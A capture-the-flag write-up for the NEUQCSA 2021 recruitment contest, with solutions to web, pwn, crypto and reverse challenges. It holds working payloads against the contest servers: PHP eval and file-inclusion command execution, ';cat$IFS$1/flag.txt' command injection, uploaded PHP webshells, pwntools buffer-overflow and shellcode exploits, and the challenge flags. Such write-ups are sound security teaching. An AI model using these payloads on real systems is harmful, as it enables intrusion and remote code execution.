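NEUQCSA-CTF-2021: Northeastern University at Qinhuangdao 2021 recruitment contest

There were a lot of web challenges I couldn't do; I really am too much of a beginner.

Solved challenges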

(Web)easy_eval

271

http://2021summer.inhann.top:50001/ An eval with a bit of filtering added..


payload

http://2021summer.inhann.top:50001/?id=var_dump(passthru(%22ls%20/%22));
http://2021summer.inhann.top:50001/?id=var_dump(passthru(%22cat%20/flaGGggGg.txt%22));

flag

flag{0cc175b9c0f12fd62f2e39dfbtahfa}

(Crypto)Checkin

100

A simple check-in…

cipher.txt
7=28L(@(/*_FO<?_H?o#~%0Hb=`PN

hint:Rest Of Time is 47 seconds
-------------------------------
hint.txt
Rest Of Time is 47 seconds

flag

flag{WoW^Y0u~kn0wn@ROT_w3l1!}

(Misc)Check-in

100

Since you're here anyway, you might as well check in. flag{http://neuqcsa.cn/}


flag

flag{http://neuqcsa.cn/}

(Web)easy_include

676

http://2021summer.inhann.top:50004/ A free file inclusion...


Since phpinfo is available, let's make use of it

Source code

<?php
show_source(__FILE__);
//flag in /flag.php
if(isset($_GET["phpinfo"])){
    phpinfo();
}
if(isset($_GET["file"])){
    if(preg_match("/filter/",$_GET["file"])){die("no filter!!");}
    include $_GET["file"];
}

Construct the payload

POST /?file=PHP://input HTTP/1.1
Host: 2021summer.inhann.top:50004
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 31

<?php system('cat /flag.php')?>

flag

flag{3582e2cd8e53c1e0be913593}

(REVERSE)Giveaway REVERSE

100

The file is available at [this site's URL]/static/post/NEUQCSA-CTF-2021-wp/ext/re/easy

flag{asertfhaiaugYukdfg}

(Web)easy_ping

775

http://2021summer.inhann.top:50003/ A ping with a bit of filtering added...


payload1

view-source:http://2021summer.inhann.top:50003/?ip=127.0.0.1;ls$IFS$1/

payload2

http://2021summer.inhann.top:50003/?ip=127.0.0.1;cat$IFS$1/flag.txt

flag

flag{3582efdc7ae760fa3fccbe41493}
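
A defensive counterpart to the two payloads above, as an added example that is not part of the original write-up: the `ip` parameter is parsed as a literal IPv4 address and passed to ping as an argument list, so `;` and `$IFS` never reach a shell. The challenge's server code is not shown on this page; `build_ping_argv`, `classify` and the Unix-style `-c` flag are assumptions made for the sketch.

```python
import ipaddress

# Constructed inputs: one benign value plus the two `ip` values used above.
SAMPLES = [
    "127.0.0.1",
    "127.0.0.1;ls$IFS$1/",
    "127.0.0.1;cat$IFS$1/flag.txt",
]


def build_ping_argv(ip_param, count=1):
    """Return an argv list for ping, or raise ValueError when the value
    is anything other than a single literal IPv4 address."""
    if not isinstance(ip_param, str):
        raise ValueError("ip must be a string")
    # IPv4Address accepts only dotted-quad text; separators, whitespace
    # and shell metacharacters all make parsing fail.
    addr = ipaddress.IPv4Address(ip_param)
    # A list passed to subprocess.run(argv) without shell=True is never
    # parsed by a shell, so no character in it has special meaning.
    return ["ping", "-c", str(count), str(addr)]


def classify(samples):
    """Map each sample to 'accepted' or 'rejected'."""
    verdicts = {}
    for value in samples:
        try:
            build_ping_argv(value)
            verdicts[value] = "accepted"
        except ValueError:  # AddressValueError is a ValueError subclass
            verdicts[value] = "rejected"
    return verdicts


if __name__ == "__main__":
    for value, verdict in classify(SAMPLES).items():
        print(verdict, repr(value))
```

Filtering spaces or individual characters is what `$IFS` sidesteps; parsing the value into the expected type leaves nothing to filter.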

(Pwn)ret2backdoor

856

easyeasyeasy nc 39.105.97.11 7777

The file is available at [this site's URL]/static/post/NEUQCSA-CTF-2021-wp/ext/pwn/ret2backdoor

from pwn import *
#p = process('./pwn0')
p = remote("39.105.97.11","7777")

system = 0x401176

payload = b'a' * (0x20+8) + p64(system)

p.sendline(payload)

p.interactive()


flag

flag{KhvwDcB0Hw9s9jF9Ld6v9LWSyAFVXY3k}

(Pwn)shellcode

991

nc 39.105.97.11 9998

The file is available at [this site's URL]/static/post/NEUQCSA-CTF-2021-wp/ext/pwn/shellcode


payload

from pwn import *

p = remote("39.105.97.11","9998")
context(os='linux', arch='amd64',log_level='debug')

p.recvuntil("Your buf is here: ")
aa = p.recvuntil("\n")
print(aa)

shellcode_address_at_stack = int(aa,16)
p.recvuntil("Do you know shellcode?")

print(shellcode_address_at_stack)

shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
len_shellcode = len(shellcode)
print("Shellcode Len:", len_shellcode)

payload = shellcode
payload += '\x90'*(0x50+8-len_shellcode)
payload += p64(shellcode_address_at_stack,endianness="little").decode("iso-8859-1")
p.sendline(payload)

p.interactive()

flag{7eDuZYbxRjSiVrxH94gWAiiBG2RT8GIB}

(Pwn)float

964

nc 39.105.97.11 8888

The file is available at [this site's URL]/static/post/NEUQCSA-CTF-2021-wp/ext/pwn/float


Found that 1.15 is 0x3FF2666666666666

payload

from pwn import *

p = remote("39.105.97.11","8888")
context(os='linux', arch='amd64',log_level='debug')

p.recvuntil("Hello!")
payload1 =p64(0x3FF2666666666666)
p.sendline(payload1)

p.interactive()


flag

flag{le5yLrvOMKXFvTmY4wLPh8qmQziHFO77}

(Web)upload

919

http://2021summer.inhann.top:50005/ Just a file upload..


Race condition

Burp Suite, 50 threads, 3000 requests sent

1. Create the PHP file

Find the flag file name

POST / HTTP/1.1
Host: 2021summer.inhann.top:50005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------210240916733958477573739493108
Content-Length: 229
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------210240916733958477573739493108
Content-Disposition: form-data; name="file"; filename="tt.php"
Content-Type: text/plain

<?php
system("ls /");

-----------------------------210240916733958477573739493108--

Get the flag

POST / HTTP/1.1
Host: 2021summer.inhann.top:50005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------210240916733958477573739493108
Content-Length: 229
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------210240916733958477573739493108
Content-Disposition: form-data; name="file"; filename="tt.php"
Content-Type: text/plain

<?php
system("cat /flag.txt");

-----------------------------210240916733958477573739493108--

2. Access it

POST /upload/tt.php HTTP/1.1
Host: 2021summer.inhann.top:50005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data
Content-Length: 229
Connection: close
Upgrade-Insecure-Requests: 1


flag

flag{46c48d2a0055f4bde571b75fupload}

(REVERSE)Mental Arithmetic Cards

991

nc 39.105.97.11 9990

The file is available at [this site's URL]/static/post/NEUQCSA-CTF-2021-wp/ext/re/kousuan


payload1

from pwn import *
import time


def run():
    p = remote("39.105.97.11", "9990")
    context(os='linux', arch='amd64', log_level = 'error')
    pwnlib.timeout.Timeout(timeout=None)
    p.recvuntil("come true.".encode('gbk'))
    for i in range(1000):
        try:
            ax = p.recv()

            if i > 998:
                print("recv:", ax)
            ax = ax.decode("iso-8859-1").replace("\n", "").replace("=", "").replace("?", "")
            ans = eval(ax)
            #print("ax:", ax, "ans:", ans)
            p.sendline(str(ans).encode('gbk'))
            print("At {}".format(i))
        except pwnlib.exception.PwnlibException as e:
            print(e)

    p.interactive()
    while True:
        pass

run()
while True:
    try:
        run()
    except:
        pass

Incomplete flag

flag{DyhwRRkSD7gvrgCz7AwFYgrTbtI

I checked the program and it really is 32 characters; this should be the read function

Found this spot

Then I didn't know how to write it; how do you convert a str to int64 in Python?

emmmmm, just adding } is enough, and to think I even wrote a program (the program below is useless)

import itertools as its
import libnum

in_= 'flag{DyhwRRkSD7gvrgCz7AwFYgrTbtI' #input()

words = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!#$%^&*}' # character set used to generate candidate strings
def gen_passwd(min_len, max_len, words): # parameters: minimum length, maximum length, character set
    while True:
        pwds = its.product(words, repeat=min_len)
        for pwd in pwds:
            yield ''.join(pwd)
        min_len += 1
        if min_len > max_len:
            break



password = gen_passwd(1, 5, words)
count = 0
while True:
    p = next(password)
    in__ = ''
    in__ = in_ + p
    num = libnum.s2n(in__)
    if num & 0x80000000 == 0:
        print(in__)
        break
    count += 1
    if count % 100000 == 0:
        print("At:", count, 'pass:', in__, "num:", num)

The flag is as follows

flag{DyhwRRkSD7gvrgCz7AwFYgrTbtI}

(Crypto)where_is_my_flag

676

Try to find your flag….

The file is available at [this site's URL]/static/post/NEUQCSA-CTF-2021-wp/ext/crt/where_is_my_flag.rar


payload1

import gmpy2


p=gmpy2.mpz(0xbdb8699374e4def5d3f3463e772ee20c08e1315c58bc3a762bd7df0eaa2df1411f60b76af536d98dea06f9baf1ba8e4e0e6e9e82f77128301b9402c1c3f8295f11e4334579f5c4c1349a7e1f979600ea203c1ecce035af549d29a42f3088504c09b3074e8680c2ef7b1a1076ac5f247faf539e8999bd21b89d5ab0010dd582db)
q=gmpy2.mpz(0x99c730753f5aa2a326e24c71b784351365a3f121b014879bbb218b70d6c295c549fff979a486693950b67895d8fee4bb3f3037f3c1998db33f80c4eda9a30573aa37eeb7987b7dc8ce6142b9f763006a6e70dc6e58a3848bfe127c987562aaf126ff6c9619f98242fe25018c94d35290131d77ef41be72231dbd394455ca8427)
e=gmpy2.mpz(0x10001)
N=p*q
c= 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
pn=(p-1)*(q-1)
d=gmpy2.invert(e,pn)
print(d)

m = pow(c, d, N)


print(hex(m))

payload2

import libnum
n=0xcfbafd2a3dacd5caa9faf7fa8ddfcdf8d3aa5e09b29d99b00278634bb7bb8ad3350a88d5b394c1382fa48b62f5a06382617c580a7148889c5950f0b754cda35b7dbe1c3919fc74f59c97ea2e9847dead3467dcb5853a1e64b88753403df4c8f043bad4053f9a84d9ff97cc819fd740c21fe402cc7eb602209521509257b3146d666c61677b68345f683421473074406368347dcbe8db7314e21cdfbd78496e48539f7e940ec78a239c57ff685d24a669a640e47eabbec89ab3c6475e31cf64d04436caacdce7630d122c50dc1fc2effe603fb5 # hexadecimal value printed above
print(libnum.n2s(n))

Decode once more

flag{h4_h4!G0t@ch4}

(REVERSE)Simple Reverse

919

It's really simple

The file is available at [this site's URL]/static/post/NEUQCSA-CTF-2021-wp/ext/re/reverse1


payload

The comments can be deleted

test = [
    0x03, 0x1D, 0x24, 0x1C, 0x06, 0x1A, 0x3C, 0x3F, 0x04, 0x32,
    0x3E, 0x11, 0x1C, 0x0B, 0x0D, 0x1F, 0xFD, 0x09, 0xF3, 0xFB,
    0x98, 0x92,0
]
'''
tar = [
    1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,0
]
'''

'''
for i in test:
    print(i)
print('------------------')
for i in range(22):
    test[i] ^= test[i+1]
'''
for i in range(21, -1, -1):
    test[i] ^= test[i+1]

'''
for j in range(22):
    test[j] += test[j+1]
'''
for j in range(21, -1, -1):
    test[j] -= test[j+1]

'''
for j in range(22):
    test[j] += j
'''
for i in range(0, 22):
    test[i] -= i

for i in test:
    #print(i)
    #continue
    if i > 256:
        print(chr(i - 256))
    elif i>=0 and i <= 256:
        print(chr(i))
    elif i < -256:
        print(chr(256+256+i))
    else:
        print(chr(256+i))


'''
def enc(a_list):
    for i in range(22):
        a_list[i] += i
    for j in range(22):
        a_list[j] += a_list[j+1]
    for k in range(22):
        a_list[k] ^= a_list[k+1]
    print(a_list)
'''
#enc(test)

flag{qweaxcdgsafdqwfd}

(Crypto)RSA_equation

775

The file is available at [this site's URL]/static/post/NEUQCSA-CTF-2021-wp/ext/crt/RSA_equation.rar


payload1

import gmpy2


from Crypto.Util.number import long_to_bytes
p_2=gmpy2.mpz(0x15554bf3279b5a5ff3a6f51348840a5c77f85d649ef89fe6f6aecca3b7a4f8954d94c041b9bf9c53605e69bf381df6b1e264dbe7cf3760d816bca53bc783efd62)+gmpy2.mpz(0x277f7e82a74a5d8142ffc15b6a580535a1b64d6e4e200918902ca748abaeebaaa08b56883c6d76ebb3a53e4461cb51629b7297af887a72cdcf57f7dc77896968)
q_2=gmpy2.mpz(0x15554bf3279b5a5ff3a6f51348840a5c77f85d649ef89fe6f6aecca3b7a4f8954d94c041b9bf9c53605e69bf381df6b1e264dbe7cf3760d816bca53bc783efd62)-gmpy2.mpz(0x277f7e82a74a5d8142ffc15b6a580535a1b64d6e4e200918902ca748abaeebaaa08b56883c6d76ebb3a53e4461cb51629b7297af887a72cdcf57f7dc77896968)

p = p_2//2 # // is floor division (divide and round down to an integer)
q = q_2//2


e=gmpy2.mpz(0x10001)
N=p*q
c= gmpy2.mpz(0x545040e44624d0b2ef5dd3e389d7e3edcd0933791f7ccce390d7c8637dd7d26d5d14ecada079d839d71f6326259e9fb65e89c8a52419ed2ffee953c78f5d66335c4cadbc2c48034430a7d3ce4c468eb17c4f04cddfe271928b794048a4a59478c4261c44e7c3e8f9fd946d48620c0069a9327cb22a4c0502d1e9869991c4b922)
pn=(p-1)*(q-1)

print(p)
print(q)
print(N)
print('pqN-----------END')
d=gmpy2.invert(e,pn)
print(d)

m = pow(c, d, N)


print(hex(m))

payload2

import libnum
n=0x666c61677b3371753474316f6e5f31734024696d706c3321217d # hexadecimal value printed above
print(libnum.n2s(n))

flag{3qu4t1on_1s@$impl3!!}


(Crypto)RSA_equation_revenge

964

Another equation to solve…

The file is available at [this site's URL]/static/post/NEUQCSA-CTF-2021-wp/ext/crt/RSA_equation_revenge.rar


Use (p-1)(q-1)=pq-p-q+1

payload1

import gmpy2


p_add_q = gmpy2.mpz(267250288454671020661183002864902079825043927948084290018881840749593744112726102797024780930797632709553108642750613400441660075135953435838879572761149456222440690951092454409936578252836007774319573115773705552877746875261145722418936676843582728011234303760521211480177882717639401447544081327143079896120)
e=65537
N=gmpy2.mpz(16917955357177705838022522227269189799965442955600174230088241413537748036079610427667748524760416412487661588166675433898394627618977795412467578931925290358440662780942041112815203687805808800979128075090221137838151372846654787093946656482304031633775358207228010135390832522575861986102844835573116079075374771222923318301544600822685589433165393483870570768619713138725020836976344994143665005213595439734053715247430701190483139697651308683944225607919788529538100719847326451607419315958484481451634531624954226369336218518430937719669057217473641902380243356961565889376657557909528540953750939711249576195159)



c=5556174183094477266451814135598079847549101214607407493539824119455757033446976990042962516935280719453306508436587735802442820646417947364018203517042867867234303222841927154859105937645608430659139623801595899283410063126536085399147208144097197880122970573526524116735044315018453029904516767525608508679020577616271754886842387942346107665596391743557339734244348287686755256712318046694093530306203491446373883714768977770886274094556846171675194528687326913219088784425334478253460076116644849541623671796578618297488203818462587973285321935678023132310392911491050341349681920275418686930590504234068089136064

pn=N-p_add_q+1

d=gmpy2.invert(e,pn)
print(d)

m = pow(c, d, N)


print(hex(m))

payload2

import libnum
n=0x666c61677b345f6c6974746c33406269747e643166663163756c745e337175347469306e217d # hexadecimal value printed above
print(libnum.n2s(n))

Got the flag

flag{4_littl3@bit~d1ff1cult^3qu4ti0n!}
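
Why leaking p+q is as bad as leaking the factors, for both RSA_equation and RSA_equation_revenge above: an added worked example, not part of the original write-up, that goes one step beyond the scripts by also recovering p and q from N and p+q. It uses a constructed toy key with small primes and only the Python standard library (Python 3.8+); the function names are hypothetical.

```python
from math import isqrt


def phi_from_sum(n, s):
    """(p-1)(q-1) = pq - (p+q) + 1, so n and s = p+q give phi directly."""
    return n - s + 1


def primes_from_sum(n, s):
    """Recover (p, q) with p >= q from n = p*q and s = p+q.

    p and q are the roots of x^2 - s*x + n = 0, so (p-q)^2 = s^2 - 4n.
    With p+q and p-q both known, p = (sum + diff) / 2 as in RSA_equation.
    """
    disc = s * s - 4 * n
    if disc < 0:
        raise ValueError("s is too small to be p+q for this n")
    diff = isqrt(disc)
    if diff * diff != disc or (s + diff) % 2:
        raise ValueError("s is not p+q for this n")
    return (s + diff) // 2, (s - diff) // 2


def decrypt_with_sum(c, e, n, s):
    """Textbook RSA decryption using only the public key and p+q."""
    d = pow(e, -1, phi_from_sum(n, s))  # modular inverse of e mod phi
    return pow(c, d, n)


def demo():
    # Constructed toy key; these are not the challenge's values.
    p, q, e = 1000003, 999983, 65537
    n, s = p * q, p + q
    m = int.from_bytes(b"flag", "big")
    c = pow(m, e, n)
    recovered = decrypt_with_sum(c, e, n, s)
    return primes_from_sum(n, s), recovered.to_bytes(4, "big")


if __name__ == "__main__":
    print(demo())
```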

Unsolved challenges

Pwn

canary

992

do you know canary? nc 39.105.97.11 9999

The file is available at [this site's URL]/static/post/NEUQCSA-CTF-2021-wp/ext/pwn/canary


Couldn't get it working; I don't know what to do next

from pwn import *



p = remote("39.105.97.11","9999")
context(os='linux', arch='amd64',log_level='debug')

payload1 = 'a'*(40)
p.sendlineafter("Welcome to NEUQCSA. What's your name?", payload1)

p.recvuntil(payload1+'\n')
#a0 = p.recvuntil('\\')
#print(a0)
aa = p.recv(8)


print(aa)
print(p.recv())

canary = u64(aa)#-0xa
print("Recv canary:", canary, hex(canary))

bin_sh_addr = 0X4011D6
ret_addr = 0X40101a

payload2 = b'a'*(40)+p64(canary)#+b'a'*8+p64(ret_addr)+p64(bin_sh_addr)
p.sendline(payload2)
p.interactive()

1000

nc 39.105.97.11 6666

The file is available at [this site's URL]/static/post/NEUQCSA-CTF-2021-wp/ext/pwn/linklist.zip

civilization

1000

Protect your citizens well and your name will go down in history. nc 39.105.97.11 9997 10:30 attachment updated

The file is available at [this site's URL]/static/post/NEUQCSA-CTF-2021-wp/ext/pwn/civilization_I_new

cgi_pwn

1000

A web pwn from Big Brother http://base.sern.site:8888/cgi-bin/test flag is in /flag.txt

The file is available at [this site's URL]/static/post/NEUQCSA-CTF-2021-wp/ext/pwn/cgi-pwn.zip

string

1000

nc 39.105.97.11 9991

The file is available at [this site's URL]/static/post/NEUQCSA-CTF-2021-wp/ext/pwn/string.zip

pie

1000

This one is a lot like canary nc 39.105.97.11 9992

The file is available at [this site's URL]/static/post/NEUQCSA-CTF-2021-wp/ext/pwn/pie

Crypto

Toomanye

1000

Quite hard problem. Can u solve it?

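The file is available at [this site's URL]/static/post/NEUQCSA-CTF-2021-wp/ext/crt/toomanye.zip

RSA_burp_and_equation

1000

Well u can’t finish it as easy as before…

The file is available at [this site's URL]/static/post/NEUQCSA-CTF-2021-wp/ext/crt/RSA_burp_and_equation.rar

reverse

Solve the Equation 1

1000

I hear some students have already started grinding advanced math???

The file is available at [this site's URL]/static/post/NEUQCSA-CTF-2021-wp/ext/re/fangcheng1

Solve the Equation 2

1000

Keep solving equations!

The file is available at [this site's URL]/static/post/NEUQCSA-CTF-2021-wp/ext/re/fangcheng2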

Web

check_in_sql

424

http://2021summer.inhann.top:50002/index.php I hear you all already know basic SQL syntax...

<?php
include "config.php";
if(isset($_GET["sql"])){
    $sql = preg_replace("/select/","",$_GET["sql"]);
    // var_dump($sql);
    $r = mysqli_query($mysqli,$sql."LionTreeNB");
    if($r && $r->num_rows){
        while($row = $r->fetch_assoc()){
            var_dump($row);
        }
    }
}
show_source(__FILE__);

easy_shell

856

It’s easy to get a webshell using php,isn’t it?
visit:http://1.15.145.49:83/index.php

?src=1string(41) "uploads/2da5fbe15be136e57fca1b86daa772cf/"
<?php
error_reporting(0);
echo "?src=1";
$dir='uploads/';
if (!is_dir($dir)) {
    mkdir($dir,0755);
}
$dir = "uploads/".md5($_SERVER['REMOTE_ADDR']).'/';
var_dump($dir);
if (!is_dir($dir)) {
    mkdir($dir,0755);
}

$content = '<?php exit; ?>';
$content .= $_POST['txt'];
$prefix=$_POST['prefix'];
$name=$_POST['name'];
if(strpos('./',$prefix) or strpos('./',$name)){
    die("?");
}
$filename=$prefix.$dir.$name;
file_put_contents($filename, $content);

if (isset($_GET['src']))
{
    highlight_file(__FILE__);
}

//flag is in /flag
?>

calc again

1000

http://47.94.140.22:8000/

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
    $str = $_GET['num'];
    $blacklist = ['[a-z]', "'", '"', '`', '\[', '\]','\^', ',','~','&','\|','\$',';'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/im', $str)) {
            die("what are you want to do?");
        }
    }
    @eval('echo '.$str.';');
}
?>

fat free again and again

1000

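http://47.94.140.22:8001/ Freshmen can skip this one

fatfree again and again!
Still /?flag=

Brand-new OJ is live

1000

*http://base.sern.site:8889 Traffic is audited on the backend; maliciously damaging the challenge environment will get you disqualified

Brand-new OJ is live
Time to test your Python skills. This is an OJ judging system I borrowed from some school.
Submit your Python script below and the system will judge whether it meets the requirements
Example
Requirement
Read an input x from standard input and output x+1
Answer
x=input()
print(int(x)+1)
Problem
Read an input x less than 100000 from standard input and determine whether x is the product of two primes; output 1 if it is and 0 if it is not (yes, this is the very core of what keeps RSA secure (doge))
Sample input
49
Sample output
1
Enter your code below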